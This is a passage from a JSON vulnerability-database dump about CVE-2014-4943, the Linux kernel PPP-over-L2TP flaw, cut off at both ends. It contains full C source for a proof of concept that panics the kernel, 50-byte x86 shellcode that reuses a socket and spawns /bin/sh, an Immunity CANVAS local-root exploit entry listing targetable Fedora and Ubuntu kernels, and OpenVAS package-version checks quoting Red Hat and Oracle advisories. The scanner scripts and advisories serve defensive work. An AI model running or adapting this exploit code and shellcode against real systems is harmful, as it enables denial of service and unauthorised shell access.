sax.pppol2tp.addr.sin_family = AF_INET;\r\n sax.pppol2tp.s_tunnel = 8;//tunnel_id;\r\n sax.pppol2tp.s_session = 0; /* special case: mgmt socket */\r\n sax.pppol2tp.d_tunnel = 0;\r\n sax.pppol2tp.d_session = 0; /* special case: mgmt socket */\r\n \r\n if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 )\r\n {\r\n perror(\"connect failed\");\r\n }\r\n \r\n /* Connect LT2P socket */\r\n struct sockaddr_pppol2tp sax2;\r\n \r\n memset(&sax, 0, sizeof(sax2));\r\n sax2.sa_family = AF_PPPOX;\r\n sax2.sa_protocol = PX_PROTO_OL2TP;\r\n sax2.pppol2tp.s_tunnel = 8;//tunnel_id;\r\n sax2.pppol2tp.s_session = 1; \r\n sax2.pppol2tp.d_tunnel = 0;\r\n sax2.pppol2tp.d_session = 1; \r\n \r\n if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 )\r\n {\r\n perror(\"connect failed\");\r\n }\r\n \r\n \r\n /*\r\n * Entering critical part\r\n */\r\n printf(\"[cve_2014_4943]: Panic!\\n\");\r\n \r\n //modifyUDPvalues(tunnel_fd);\r\n modifyUDPvalues(tunnel_fd2);\r\n \r\n \r\n // close opened socket \r\n puts(\"\\n [+] Closing sockets...\");\r\n close(tunnel_fd);\r\n close(tunnel_fd2);\r\n \r\n exit(0);\r\n}\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23356"}], "exploitdb": [{"lastseen": "2016-02-03T20:25:18", "osvdbidlist": ["109277"], "references": [], "edition": 1, "description": "Linux x86 - Socket Re-use Shellcode (50 bytes). CVE-2014-4943. Shellcode exploit for lin_x86 platform", "reporter": "ZadYree", "published": "2014-07-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Linux x86 - Socket Re-use Shellcode 50 bytes", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4943"], "modified": "2014-07-14T00:00:00", "id": "EDB-ID:34060", "href": "https://www.exploit-db.com/exploits/34060/", "sourceData": "/* Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes\r\n * <zadyree@tuxfamily.org>\r\n *\r\n * Made using sockfd trick + dup2(0,0), dup2(0,1), dup2(0,2) +\r\n * execve /bin/sh\r\n *\r\n * Thanks: Charles Stevenson, ipv, 3LRVS research team\r\n *\r\n * gcc -o socket_reuse socket_reuse.c -z execstack\r\n */\r\n\r\nchar shellcode[]= /* We use sys_dup(2) to get the previous attributed sockfd */\r\n\"\\x6a\\x02\" // push 0x2\r\n\"\\x5b\" // pop ebx\r\n\"\\x6a\\x29\" // push 0x29\r\n\"\\x58\" // pop eax\r\n\"\\xcd\\x80\" // int 0x80 -> call dup(2)\r\n\"\\x48\" // dec eax\r\n/* Now EAX = our Socket File Descriptor */\r\n\r\n\"\\x89\\xc6\" // mov esi, eax\r\n\r\n/* dup2(fd,0); dup2(fd,1); dup2(fd,2); */\r\n\"\\x31\\xc9\" // xor %ecx,%ecx\r\n\"\\x56\" // push %esi\r\n\"\\x5b\" // pop %ebx\r\n// loop:\r\n\"\\x6a\\x3f\" // push $0x3f\r\n\"\\x58\" // pop %eax\r\n\"\\xcd\\x80\" // int $0x80\r\n\"\\x41\" // inc %ecx\r\n\"\\x80\\xf9\\x03\" // cmp $0x3,%cl\r\n\"\\x75\\xf5\" // jne 80483e8 <loop>\r\n\r\n/* execve /bin/sh by ipv */\r\n\"\\x6a\\x0b\" // push byte 0xb\r\n\"\\x58\" // pop eax\r\n\"\\x99\" // cdq\r\n\"\\x52\" // push edx\r\n\"\\x31\\xf6\" // xor esi, esi - We add those instructions\r\n\"\\x56\" // push esi - to clean up the arg stack\r\n\"\\x68\\x2f\\x2f\\x73\\x68\" // push dword 0x68732f2f\r\n\"\\x68\\x2f\\x62\\x69\\x6e\" // push dword 0x6e69922f\r\n\"\\x89\\xe3\" // mov ebx, esp\r\n\"\\x31\\xc9\" // xor ecx, ecx\r\n\"\\xcd\\x80\"; // int 0x80\r\n;\r\n\r\n/* \r\n\r\nshellcode[]=\r\n\"\\x6a\\x02\\x5b\\x6a\\x29\\x58\\xcd\\x80\\x48\\x89\\xc6\"\r\n\"\\x31\\xc9\\x56\\x5b\\x6a\\x3f\\x58\\xcd\\x80\\x41\\x80\"\r\n\"\\xf9\\x03\\x75\\xf5\\x6a\\x0b\\x58\\x99\\x52\\x31\\xf6\"\r\n\"\\x56\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\"\r\n\"\\x89\\xe3\\x31\\xc9\\xcd\\x80\";\r\n\r\n*/\r\n\r\n\r\nint main(void)\r\n{\r\n printf(\"Shellcode length: %d\\n\", strlen(shellcode));\r\n (*(void(*)()) shellcode)(); \r\n return 0;\r\n}\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34060/"}, {"lastseen": "2016-02-04T03:06:47", "osvdbidlist": ["109277"], "references": [], "edition": 1, "description": "Linux Kernel PPP-over-L2TP Socket Level Handling - Crash PoC. CVE-2014-4943. Dos exploit for linux platform", "reporter": "Emeric Nasi", "published": "2015-03-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "Linux Kernel PPP-over-L2TP Socket Level Handling - Crash PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4943"], "modified": "2015-03-04T00:00:00", "id": "EDB-ID:36267", "href": "https://www.exploit-db.com/exploits/36267/", "sourceData": "/* ----------------------------------------------------------------------------------------------------\r\n * cve-2014-4943_poc.c\r\n * \r\n * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure \r\n * differences between an l2tp socket and an inet socket. \r\n * \r\n * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.\r\n * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.\r\n * There are some kernel structures that can be overwriten but I didn't manage to find the ultimate trick to at least point back to userland.\r\n * If seems guys at immunuty found a way using race condition.\r\n *\r\n * \r\n * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c \r\n * \r\n * Emeric Nasi - www.sevagas.com\r\n *-----------------------------------------------------------------------------------------------------*/\r\n \r\n\r\n \r\n/* ----------------------- Includes ----------------------------*/\r\n\r\n#include <netinet/ip.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <sys/mman.h>\r\n#include <linux/net.h>\r\n#include <linux/udp.h>\r\n#include <linux/if.h>\r\n#include <linux/if_pppox.h>\r\n#include <linux/if_pppol2tp.h>\r\n\r\n\r\n/* ----------------------- Definitions ----------------------------*/\r\n\r\n#define TARGET_KERNEL_MIN \"3.2.0\"\r\n#define TARGET_KERNEL_MAX \"3.15.6\"\r\n#define EXPLOIT_NAME \"cve-2014-4943\"\r\n\r\n\r\n\r\n/* ----------------------- functions ----------------------------*/\r\n\r\n\r\n/**\r\n * It is possible to modify several parts of socket object using IP options frop UDP setsockopt\r\n * For this POC, IP_OPTIONS is the easiest way to panic kernel\r\n */\r\nvoid modifyUDPvalues(int tunnel_fd)\r\n{\r\n/* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:\r\n \r\n int udp_setsockopt(struct sock *sk, int level, int optname,\r\n char __user *optval, unsigned int optlen)\r\n {\r\n if (level == SOL_UDP || level == SOL_UDPLITE)\r\n return udp_lib_setsockopt(sk, level, optname, optval, optlen,\r\n udp_push_pending_frames);\r\n return ip_setsockopt(sk, level, optname, optval, optlen);\r\n }\r\n*/\r\n \r\n int ip_options = 0x1;\r\n \r\n if (setsockopt(tunnel_fd, SOL_IP, IP_OPTIONS, &ip_options, 20) == -1) \r\n {\r\n perror(\"setsockopt (IP_OPTIONS)\"); \r\n }\r\n}\r\n\r\n\r\n/**\r\n * DOS poc for cve_2014_4943 vulnerability\r\n */\r\nint main()\r\n{\r\n\r\n int tunnel_fd;\r\n int tunnel_fd2;\r\n int udp_fd;\r\n\r\n printf(\"[cve_2014_4943]: Preparing to exploit.\\n\");\r\n\r\n /* Create first L2TP socket */\r\n tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);\r\n if (tunnel_fd < 0)\r\n {\r\n perror(\"socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)\");\r\n return -1;\r\n }\r\n /* Create second L2TP socket */\r\n tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);\r\n if (tunnel_fd2 < 0)\r\n {\r\n perror(\"socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)\");\r\n return -1;\r\n }\r\n if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) \r\n {\r\n perror(\"cannot create socket\"); \r\n return -1; \r\n }\r\n \r\n /* Connect LT2P socket */\r\n struct sockaddr_pppol2tp sax;\r\n\r\n memset(&sax, 0, sizeof(sax));\r\n sax.sa_family = AF_PPPOX;\r\n sax.sa_protocol = PX_PROTO_OL2TP;\r\n sax.pppol2tp.fd = udp_fd; /* fd of tunnel UDP socket */\r\n sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr;\r\n sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port;\r\n sax.pppol2tp.addr.sin_family = AF_INET;\r\n sax.pppol2tp.s_tunnel = 8;//tunnel_id;\r\n sax.pppol2tp.s_session = 0; /* special case: mgmt socket */\r\n sax.pppol2tp.d_tunnel = 0;\r\n sax.pppol2tp.d_session = 0; /* special case: mgmt socket */\r\n\r\n if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 )\r\n {\r\n perror(\"connect failed\");\r\n }\r\n \r\n /* Connect LT2P socket */\r\n struct sockaddr_pppol2tp sax2;\r\n\r\n memset(&sax, 0, sizeof(sax2));\r\n sax2.sa_family = AF_PPPOX;\r\n sax2.sa_protocol = PX_PROTO_OL2TP;\r\n sax2.pppol2tp.s_tunnel = 8;//tunnel_id;\r\n sax2.pppol2tp.s_session = 1; \r\n sax2.pppol2tp.d_tunnel = 0;\r\n sax2.pppol2tp.d_session = 1; \r\n\r\n if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 )\r\n {\r\n perror(\"connect failed\");\r\n }\r\n \r\n \r\n /*\r\n * Entering critical part\r\n */\r\n printf(\"[cve_2014_4943]: Panic!\\n\");\r\n \r\n //modifyUDPvalues(tunnel_fd);\r\n modifyUDPvalues(tunnel_fd2);\r\n\r\n \r\n // close opened socket \r\n puts(\"\\n [+] Closing sockets...\");\r\n close(tunnel_fd);\r\n close(tunnel_fd2);\r\n \r\n exit(0);\r\n}\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36267/"}], "canvas": [{"lastseen": "2016-09-25T14:12:32", "references": [], "edition": 1, "description": "**Name**| linux_pppol2tp \n---|--- \n**CVE**| CVE-2014-4943 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| pppol2tp local root \n**Notes**| Repeatability: Single \nNotes: \n \nExploit for Linux >= 3.4.x (amd64) and >= 3.7.x (x86) \n \nTested on \n\\+ Ubuntu 13.04 / 13.10 / 14.04 (x86/amd64) \n\\+ Fedora 17 (amd64 only) \n\\+ Fedora 18/19/20 (x86/amd64) \n \nNote: Debian is _not_ supported. \n \n[+] Exhaustive list of supported kernels (AMD64): \n-> [0] 3.14.5-200.fc20.x86_64 - Fedora 20.00 \n-> [1] 3.13.5-200.fc20.x86_64 - Fedora 20.00 \n-> [2] 3.12.10-300.fc20.x86_64 - Fedora 20.00 \n-> [3] 3.11.10-301.fc20.x86_64 - Fedora 20.00 \n-> [4] 3.14.5-100.fc19.x86_64 - Fedora 19.00 \n-> [5] 3.12.9-200.fc19.x86_64 - Fedora 19.00 \n-> [6] 3.11.6-200.fc19.x86_64 - Fedora 19.00 \n-> [7] 3.10.7-200.fc19.x86_64 - Fedora 19.00 \n-> [8] 3.9.5-301.fc19.x86_64 - Fedora 19.00 \n-> [9] 3.11.10-100.fc18.x86_64 - Fedora 18.00 \n-> [10] 3.9.6-200.fc18.x86_64 - Fedora 18.00 \n-> [11] 3.7.9-205.fc18.x86_64 - Fedora 18.00 \n-> [12] 3.6.10-4.fc18.x86_64 - Fedora 18.00 \n-> [13] 3.9.10-100.fc17.x86_64 - Fedora 17.00 \n-> [14] 3.13.0-30-generic - Ubuntu 14.04 \n-> [15] 3.13.0-29-generic - Ubuntu 14.04 \n-> [16] 3.13.0-27-generic - Ubuntu 14.04 \n-> [17] 3.13.0-24-generic - Ubuntu 14.04 \n-> [18] 3.11.0-24-generic - Ubuntu 13.10 \n-> [19] 3.11.0-23-generic - Ubuntu 13.10 \n-> [20] 3.11.0-12-generic - Ubuntu 13.10 \n-> [21] 3.8.0-19-generic - Ubuntu 13.04 \n[+] Exhaustive list of supported kernels (x86): \n-> [0] 3.15.4-200.fc20.i686 - Fedora 20.00 \n-> [1] 3.14.9-200.fc20.i686 - Fedora 20.00 \n-> [2] 3.13.7-200.fc20.i686 - Fedora 20.00 \n-> [3] 3.12.10-300.fc20.i686 - Fedora 20.00 \n-> [4] 3.11.10-301.fc20.i686 - Fedora 20.00 \n-> [5] 3.14.9-100.fc19.i686 - Fedora 19.00 \n-> [6] 3.14.8-100.fc19.i686 - Fedora 19.00 \n-> [7] 3.13.11-100.fc19.i686 - Fedora 19.00 \n-> [8] 3.12.9-200.fc19.i686 - Fedora 19.00 \n-> [9] 3.9.5-301.fc19.i686 - Fedora 19.00 \n-> [10] 3.11.10-100.fc18.i686 - Fedora 18.00 \n-> [11] 3.10.10-100.fc18.i686 - Fedora 18.00 \n-> [12] 3.8.11-200.fc18.i686 - Fedora 18.00 \n-> [13] 3.7.9-201.fc18.i686 - Fedora 18.00 \n-> [14] 3.6.0-3.fc18.i686 - Fedora 18.00 \n-> [15] 3.13.0-30-generic - Ubuntu 14.04 \n-> [16] 3.13.0-29-generic - Ubuntu 14.04 \n-> [17] 3.13.0-27-generic - Ubuntu 14.04 \n-> [18] 3.13.0-24-generic - Ubuntu 14.04 \n-> [19] 3.11.0-24-generic - Ubuntu 13.10 \n-> [20] 3.11.0-23-generic - Ubuntu 13.10 \n-> [21] 3.11.0-19-generic - Ubuntu 13.10 \n-> [22] 3.11.0-12-generic - Ubuntu 13.10 \n-> [23] 3.8.0-19-generic - Ubuntu 13.04 \n \nVENDOR: GNU/Linux \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943 \nCVE Name: CVE-2014-4943 \n\n", "reporter": "Immunity Canvas", "published": "2014-07-19T15:55:08", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "canvas", "title": "Immunity Canvas: LINUX_PPPOL2TP", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4943"], "modified": "2014-07-19T15:55:08", "id": "LINUX_PPPOL2TP", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/linux_pppol2tp", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-04-09T11:11:21", "references": ["https://www.redhat.com/archives/rhsa-announce/2014-July/msg00049.html", "2014:0923-01"], "pluginID": "1361412562310871214", "description": "Check for the Version of kernel", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-07-28T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "RedHat Update for kernel RHSA-2014:0923-01", "type": "openvas", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871214", "id": "OPENVAS:1361412562310871214", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2014:0923-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871214\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:47:26 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for kernel RHSA-2014:0923-01\");\n\n tag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced\nprocess' instruction pointer to be set to a non-canonical memory address\nwithout forcing the non-sysret code path when returning to user space.\nA local, unprivileged user could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-4699,\nImportant)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699,\nand Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\";\n\n tag_affected = \"kernel on Red Hat Enterprise Linux Server (v. 7)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2014:0923-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2014-July/msg00049.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~123.4.4.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:53:54", "references": ["http://linux.oracle.com/errata/ELSA-2014-3047.html"], "pluginID": "1361412562310123380", "description": "Oracle Linux Local Security Checks ELSA-2014-3047", "edition": 2, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2014-3047", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2017-07-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123380", "id": "OPENVAS:1361412562310123380", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2014-3047.nasl 6559 2017-07-06 11:57:32Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.123380\");\nscript_version(\"$Revision: 6559 $\");\nscript_tag(name:\"creation_date\", value:\"2015-10-06 14:03:02 +0300 (Tue, 06 Oct 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:57:32 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2014-3047\");\nscript_tag(name: \"insight\", value: \"ELSA-2014-3047 - unbreakable enterprise kernel security update - [2.6.39-400.215.4]- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha Levin) [Orabug: 19229505] {CVE-2014-4943} {CVE-2014-4943}- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) [Orabug: 19230690] {CVE-2014-4699}\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2014-3047\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2014-3047.html\");\nscript_cve_id(\"CVE-2014-4943\",\"CVE-2014-4699\");\nscript_tag(name:\"cvss_base\", value:\"6.9\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.39~400.215.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.215.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.215.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.215.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.215.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.215.4.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.39~400.215.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.215.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.215.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.215.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.215.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.215.4.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": 